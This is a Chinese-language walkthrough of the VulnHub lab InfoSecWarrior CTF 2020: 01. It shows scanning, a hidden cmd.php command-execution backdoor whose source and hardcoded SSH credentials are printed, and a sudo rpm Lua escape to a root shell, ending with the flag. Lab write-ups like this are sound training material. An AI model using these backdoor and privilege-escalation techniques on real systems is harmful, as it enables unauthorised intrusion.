Infosec Warrior
靶机信息
名称:InfoSecWarrior CTF 2020: 01
地址:
https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-01,446/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:d5:a2:4d 1 60 PCS Systemtechnik GmbH
192.168.56.216 08:00:27:d2:cf:be 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.216
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.216 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-02 05:54 EST
Nmap scan report for 192.168.56.216
Host is up (0.00037s latency).
Not shown: 65347 filtered tcp ports (no-response), 186 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 2fb3a5cde51433a1823bdd5a5ed75936 (DSA)
|_ 2048 2db4152836d8b54e18818eaf3ee4dec1 (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.15 (CentOS)
MAC Address: 08:00:27:D2:CF:BE (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.14 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ curl http://192.168.56.216/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.2.15 (CentOS) Server at 192.168.56.216 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ nikto -h http://192.168.56.216
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.216
+ Target Hostname: 192.168.56.216
+ Target Port: 80
+ Start Time: 2023-01-02 05:59:54 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Server may leak inodes via ETags, header found with file /sitemap.xml, inode: 264859, size: 292, mtime: Thu Feb 13 06:51:21 2020
+ OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8743 requests: 18 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-01-02 06:00:15 (GMT-5) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/02 06:01:02 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.216/wordpress/]
Progress: 1890 / 220561 (0.86%)[ERROR] 2023/01/02 06:01:02 [!] Get "http://192.168.56.216/webcam": read tcp 192.168.56.206:52706->192.168.56.216:80: read: connection reset by peer
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/01/02 06:01:04 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/02 06:01:30 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.216/wordpress/]
Progress: 77818 / 220561 (35.28%)[ERROR] 2023/01/02 06:02:02 [!] Get "http://192.168.56.216/understanding_t": read tcp 192.168.56.206:36771->192.168.56.216:80: read: connection reset by peer
Progress: 218689 / 220561 (99.15%)===============================================================
2023/01/02 06:03:37 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.txt,sh --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,js,txt,sh
[+] Timeout: 10s
===============================================================
2023/01/02 06:15:02 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 287]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.216/wordpress/]
/note.txt (Status: 200) [Size: 120]
/cmd.php (Status: 302) [Size: 2] [--> https://www.armourinfosec.com/category/information-gathering/]
/.html (Status: 403) [Size: 287]
Progress: 1323360 / 1323366 (100.00%)===============================================================
2023/01/02 06:28:04 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ curl http://192.168.56.216/wordpress/
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Database Error</title>
</head>
<body>
<h1>Error establishing a database connection</h1>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ curl http://192.168.56.216/note.txt
Note Form Developer Team
1. Try Harder
2. Enumeration is the key
Ping Us on @armourinfosec @MAALP1225 @CyberKnight00
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.js,.txt,sh --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,js,txt,sh
[+] Timeout: 10s
===============================================================
2023/01/02 07:32:26 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.html (Status: 403) [Size: 296]
/.htaccess.js (Status: 403) [Size: 294]
/.htaccess.txt (Status: 403) [Size: 295]
/.htaccess (Status: 403) [Size: 291]
/.htpasswd.txt (Status: 403) [Size: 295]
/.htaccess.sh (Status: 403) [Size: 294]
/.htpasswd.js (Status: 403) [Size: 294]
/.htaccess.php (Status: 403) [Size: 295]
/.htpasswd (Status: 403) [Size: 291]
/.htpasswd.html (Status: 403) [Size: 296]
/.htpasswd.sh (Status: 403) [Size: 294]
/.htpasswd.php (Status: 403) [Size: 295]
/cgi-bin/.html (Status: 403) [Size: 295]
/cgi-bin/ (Status: 403) [Size: 290]
/cmd.php (Status: 302) [Size: 2] [--> https://www.armourinfosec.com/category/information-gathering/]
/note.txt (Status: 200) [Size: 120]
/sitemap.xml (Status: 200) [Size: 292]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.216/wordpress/]
Progress: 120805 / 122862 (98.33%)===============================================================
2023/01/02 07:33:35 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.js,.txt,sh --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,js,txt,sh
[+] Timeout: 10s
===============================================================
2023/01/02 07:33:51 Starting gobuster in directory enumeration mode
===============================================================
/.hta.php (Status: 403) [Size: 290]
/.hta (Status: 403) [Size: 286]
/.hta.js (Status: 403) [Size: 289]
/.hta.sh (Status: 403) [Size: 289]
/.hta.html (Status: 403) [Size: 291]
/.hta.txt (Status: 403) [Size: 290]
/.htaccess.sh (Status: 403) [Size: 294]
/.htaccess.js (Status: 403) [Size: 294]
/.htaccess.html (Status: 403) [Size: 296]
/.htaccess.txt (Status: 403) [Size: 295]
/.htaccess (Status: 403) [Size: 291]
/.htpasswd (Status: 403) [Size: 291]
/.htaccess.php (Status: 403) [Size: 295]
/.htpasswd.php (Status: 403) [Size: 295]
/.htpasswd.sh (Status: 403) [Size: 294]
/.htpasswd.js (Status: 403) [Size: 294]
/.htpasswd.html (Status: 403) [Size: 296]
/.htpasswd.txt (Status: 403) [Size: 295]
/cgi-bin/ (Status: 403) [Size: 290]
/cgi-bin/.html (Status: 403) [Size: 295]
/cmd.php (Status: 302) [Size: 2] [--> https://www.armourinfosec.com/category/information-gathering/]
/note.txt (Status: 200) [Size: 120]
/sitemap.xml (Status: 200) [Size: 292]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.216/wordpress/]
Progress: 28052 / 28284 (99.18%)===============================================================
2023/01/02 07:33:57 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ curl http://192.168.56.216/sitemap.xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://infosecwarrior.com/sitemap/0.9">
<url>
<loc>http://infosecwarrior.com/index.htnl</loc>
<lastmod>2020-02-13</lastmod>
<changefreq>monthly</changefreq>
<priority>0.8</priority>
</url>
</urlset>
这里需要仔细看有个index.htnl,不是index.html,
访问
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ curl http://192.168.56.216/index.htnl
<h1>Keep Calm And HACK</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="1280">
<img hidden="True" src="minnions.gif" alt="Hackor" height="640" width="1280">
<form action = "/cmd.php" hidden="True" method = "GET">
command
<input type = "text" name = "AI" value = "" maxlength = "100" />
<br />
<input type = "submit" value ="Submit" />
</form>
提示有个表单,调出开发者工具,将Hidden="True"删掉,此时页面会出现命令执行输入框
当输入id,返回
Now the main part what it is loooooool
Try other method
因此可能方法应该是POST,可以用burpsuite来拦截请求,并修改请求方法:
发现可以正常执行,通过执行命令cat cmd.php,
You Found ME : - (
";
echo "Try other method";
die;
}
if(isset($_POST['AI'])){
echo "You Found ME : - (";
echo "
";
$cmd = ($_POST['AI']);
system($cmd);
echo "
";
die;
}
else {
header("Location: https://www.armourinfosec.com/category/information-gathering/");
}
$user="isw0";
$pass="123456789blabla";
?>
发现了用户名和密码
username:isw0
password:123456789blabla
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ ssh [email protected]
Unable to negotiate with 192.168.56.216 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ ssh [email protected] -oHostKeyAlgorithms=+ssh-dss
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the DSA key sent by the remote host is
SHA256:k7Z+v1xXZDVvuiUjQxQJ89yKvN0yffDJnR5yQvPnoS8.
Please contact your system administrator.
Add correct host key in /home/kali/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/kali/.ssh/known_hosts:15
remove with:
ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.168.56.216"
Host key for 192.168.56.216 has changed and you have requested strict checking.
Host key verification failed.
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.168.56.216"
# Host 192.168.56.216 found: line 14
# Host 192.168.56.216 found: line 15
/home/kali/.ssh/known_hosts updated.
Original contents retained as /home/kali/.ssh/known_hosts.old
┌──(kali㉿kali)-[~/Vulnhub/Infosec_Warrior]
└─$ ssh [email protected] -oHostKeyAlgorithms=+ssh-dss
The authenticity of host '192.168.56.216 (192.168.56.216)' can't be established.
DSA key fingerprint is SHA256:k7Z+v1xXZDVvuiUjQxQJ89yKvN0yffDJnR5yQvPnoS8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.216' (DSA) to the list of known hosts.
[email protected]'s password:
Last login: Mon Feb 17 13:56:07 2020 from 192.168.56.1
[isw0@InfosecWarrior ~]$ id
uid=500(isw0) gid=500(isw0) groups=500(isw0) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[isw0@InfosecWarrior ~]$
提权
[isw0@InfosecWarrior ~]$ sudo -l
Matching Defaults entries for isw0 on this host:
!visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE
LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User isw0 may run the following commands on this host:
(!root) NOPASSWD: /bin/bash
(root) /bin/ping, (root) /bin/ping6, (root) /bin/rpm, (root) /bin/ls, (root) /bin/mktemp
[isw0@InfosecWarrior ~]$ sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'
[sudo] password for isw0:
sh-4.1# cd /root
sh-4.1# ls -alh
total 56K
dr-xr-x---. 2 root root 4.0K Feb 14 2020 .
dr-xr-xr-x. 21 root root 4.0K Jan 2 16:21 ..
-rw-------. 1 root root 1.1K Feb 12 2020 anaconda-ks.cfg
-rwx------. 1 root root 65 Feb 14 2020 Armour.sh
lrwxrwxrwx. 1 root root 9 Feb 12 2020 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 May 20 2009 .bash_logout
-rw-r--r--. 1 root root 176 May 20 2009 .bash_profile
-rw-r--r--. 1 root root 176 Sep 23 2004 .bashrc
-rw-r--r--. 1 root root 100 Sep 23 2004 .cshrc
----------. 1 root root 33 Feb 13 2020 flag.txt
-rw-r--r--. 1 root root 8.3K Feb 12 2020 install.log
-rw-r--r--. 1 root root 3.4K Feb 12 2020 install.log.syslog
-rw-r--r--. 1 root root 129 Dec 4 2004 .tcshrc
sh-4.1# cat flag.txt
fc9c6eb6265921315e7c70aebd22af7e
sh-4.1#
经验教训
- 事实上在做目录文件扫描的时候已经扫描出sitemap.xml,但是由于粗心,只认为是普通的index.html文件被忽略,而事实上是index.htnl文件,导致无法进行下去。